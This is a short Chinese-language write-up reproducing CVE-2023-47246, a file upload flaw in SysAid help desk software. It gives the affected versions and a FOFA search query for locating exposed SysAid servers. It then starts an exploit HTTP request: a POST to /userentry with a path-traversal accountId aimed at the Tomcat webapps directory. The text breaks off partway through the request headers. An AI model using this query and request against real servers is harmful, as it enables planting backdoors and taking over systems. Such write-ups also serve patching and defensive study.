SysAid userentry 文件上传漏洞复现（CVE-2023-47246）

0x01 产品简介

SysAid 是一种信息技术（IT）服务管理和帮助台解决方案，旨在帮助组织更有效地管理其IT基础设施、服务台支持和用户需求。SysAid 提供了一系列的功能，包括故障报告、资产管理、问题管理、变更管理、知识库、自动化工作流程等，以帮助企业提高IT服务的效率和质量。

0x02 漏洞概述

SysAid 在 userentry 存在文件上传漏洞，攻击者可以利用文件上传漏洞执行恶意代码、写入后门、读取敏感文件，从而可能导致服务器受到攻击并被控制。

0x03 影响范围

SysAid version < 23.3.36

0x04 复现环境

FOFA：

body="sysaid-logo-dark-green.png" || title="SysAid Help Desk Software" || body="Help Desk software <a href=\"http://www.sysaid.com\">by SysAid</a>"

0x05 漏洞复现 

Exp

POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_1